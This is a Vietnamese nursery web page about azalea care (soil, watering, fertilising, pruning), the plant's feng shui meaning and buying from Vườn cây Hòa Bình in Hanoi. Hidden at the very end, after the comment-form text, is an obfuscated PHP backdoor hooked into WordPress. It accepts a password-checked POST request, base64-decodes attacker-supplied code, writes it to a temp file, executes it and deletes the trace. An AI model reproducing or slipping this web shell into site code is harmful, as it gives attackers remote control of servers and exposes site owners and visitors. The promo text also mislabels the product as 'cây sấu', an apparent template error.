Cách chăm sóc cây đỗ quyên và ý nghĩa phong thủy cây đỗ quyên

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cách chăm sóc cây Đỗ Quyên và ý nghĩa phong thủy – Hoa đỗ quyên là loài hoa vô cùng quen thuộc, dễ bắt gặp ở nhiều nơi bởi nó không đắt, cách chăm sóc đơn giản, hoa vừa đẹp, vừa mang nhiều ý nghĩa phong thủy.

Trong bài viết này, hãy cùng Vườn cây Hòa Bình tìm hiểu về cách chăm sóc hoa đỗ quyên cũng như những ý nghĩa phong thủy của nó nhé.

Cách chăm sóc Cây Đỗ Quyên

Chọn giống

Để hoa nở đẹp, bạn cần chọn được giống hoa tốt. Giống hoa đỗ quyên có rất nhiều loại, từ cây giống, hạt giống hay giâm cành.

Giâm hay chiết cành là phương pháp trồng hoa đỗ quyên được nhiều người lựa chọn nhất bởi thời gian nở hoa sẽ nhanh hơn, đồng thời cây phát triển tốt hơn mà không cần chăm sóc quá kỳ công như gieo hạt.

cây_đỗ_quyên
Cách chăm sóc Cây Đỗ Quyên

Đất 

Đất có ảnh hưởng rất nhiều đến khả năng phát triển của cây. Đất trồng hoa đỗ quyên phải là loại đất tơi xốp, có khả năng thoát nước tốt, nhiều mùn để hoa không bị úng nước.

Độ pH trong nước tốt nhất là 4-5. Để cây phát triển tốt nhất thì nên trộn đất với mùn của các loại lá cây họ thông, tùng mục.

Chậu

Chọn chậu cho hoa đỗ quyên cũng cần rất kỹ lưỡng. Chậu không nên to quá, không nên nhỏ quá, phải cân đối với cây. Ở chậu nên có một lỗ để thoát nước nếu lỡ tưới quá nhiều nước. Miệng chậu cần rộng để nước có thể bốc hơi.

Nước

Khi tưới nước cho hoa, hãy tưới vào buổi sáng sớm hoặc chiều muộn, khi không có ánh nắng gắt. Khi cây ra hoa thì nên tưới nhiều hơn bình thường.

Tưới nước chỉ tưới đủ ẩm đất, không để nước ngập đất. Khi nào thấy đất khô mới tưới. Cứ 10 – 15 ngày lại tưới một lần giấm ăn pha loãng 10%, nếu không thì dùng nước gạo vo, nước đậu chua pha loãng mà tưới. 5 – 10 ngày tưới nước giải ngấu pha loãng một lần. Kết hợp mỗi tháng một lần tưới sunfat sắt pha loãng 0,5 – 1%, cây sẽ không bị bệnh vàng lá.

Trong thời gian cây ra hoa không nên tưới nước vào hoa vì sẽ làm hoa dễ bị úng và nhanh hỏng.

>>> Xem thêm: Bán cây công trình giá rẻ – mua bán cây công trình giá rẻ Hà Nội

Bón phân

Nên sử dụng phân khô bón ít, phân nước pha loãng. Thông thường chỉ bón phân với các cây từ 2 năm tuổi trở lên. Nếu cây còn bé thì nên bón phân 1 tháng 1 lần. 

tác_dụng_cây_hoa_đỗ_quyên
Cách chăm sóc Cây Đỗ Quyên

Đối với cây từ 4 năm trở lên, mỗi năm bón 2 lần phân khô vào mùa xuân và mùa thu, giữa tháng 6 thì bón một lần phân P, K. Sau tháng 6 thì ngừng bón phân, đến khi tàn, cây mọc cành mới có thể bón nước phân loãng.

Tỉa cành

Tỉa cành sẽ giúp tập trung dinh dưỡng để nuôi cây, đồng thời giúp cây phát triển theo hình dáng như ý muốn. Thời gian để cắt tỉa cây đỗ quyên đó là mùa sinh trưởng và kỳ ngủ nghỉ. Khi cắt tỉa nên ngắt ngọn, uốn cành và cắt bớt lá trên cây.

Vị trí đặt cây

Khi đặt cây đỗ quyên trong nhà, bạn nên chọn những nơi có ánh sáng và thoáng gió. Thời gian trưng bày trong phòng không được để quá lâu, trong vòng khoảng 1 tháng phải thay đổi đưa chậu ra vườn để chăm sóc.

Ý nghĩa phong thủy của cây đỗ quyên

Hoa đỗ quyên tượng trưng cho tình yêu đôi lứa. Loài hoa này là biểu tượng của vận khí may mắn, trong phong thủy. Cây hoa đỗ quyên chính là loại cây tốt nhất dùng để trang trí và xua tan những luồng khí độc hại đem đến luồng sinh khí mới và hồng vận cho gia chủ.

Ý nghĩa phong thủy của cây đỗ quyên
Ý nghĩa phong thủy của cây đỗ quyên

>>> Xem thêm: Dịch vụ mua, bán cây trồng giá rẻ tại Hà Nội

Cách trưng bày cây hoa đỗ quyên theo phong thủy

Đặt cây ở phòng khách

Theo phong thủy phòng khách chính là nơi quan trọng nhất của ngôi nhà, thể hiện tính cách của chủ nhà và cũng ảnh hưởng rất lớn đến phong thủy của gia chủ. Đặt cây ở đây sẽ giúp gia chủ có nhiều hồng vận, may mắn và thịnh vượng trong cả năm.

Đặt cây ở bàn làm việc

Đây là cách để thư giãn tốt nhất, đỗ quyên giúp lấy đi luồng khí xấu, thay vào đó luồng khí mới. Theo phong thủy sẽ giúp bạn có những bước đột phá và thăng tiến nhanh hơn trong công việc.

Đặt cây ở ban công

Đây là nơi gia đình bạn đón luồng khí từ bên ngoài vào nhà cũng như thay đổi, làm mới không khí bên trong ngôi nhà. Cây hoa đỗ quyên sẽ là trợ thủ đắc lực trong việc đẩy khí xấu, tăng lượng sinh khí và đem đến sức khỏe dồi dào cho các thành viên trong gia đình bạn.

Cách trưng bày cây hoa đỗ quyên theo phong thủy
Cách trưng bày cây hoa đỗ quyên theo phong thủy

>>> Xem thêm: Bán cây công trình

Địa chỉ mua cây đỗ quyên 2021

Đỗ quyên là loài hoa rất phù hợp để trang trí trong nhà, đồng thời đem đến những điều tốt lành cho gia đình. Nếu bạn muốn mua cây đỗ quyên , hãy đến với Vườn cây Hòa Bình. Tại Vườn cây Hòa Bình, chúng tôi chuyên cung cấp các loại cây xanh công trình, cây phong thủy, cây nội thất, cây ngoại thất và cả giống cây ăn quả các loại.

>>> Xem thêm: Thông tin chi tiết về Vườn cây Hòa Bình

Các loại cây luôn sẵn sàng về số lượng và được chuẩn bị kỹ lưỡng trước khi giao đến khách hàng.

CÂY CÔNG TRÌNH GIÁ RẺ TẠI HÀ NỘI

Hotline: 0962.376.560

Địa chỉ: Cầu Mai Lĩnh, Biên giang , Hà Đông ,Hà Nội

Website https://vuoncayhoabinh.com/

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}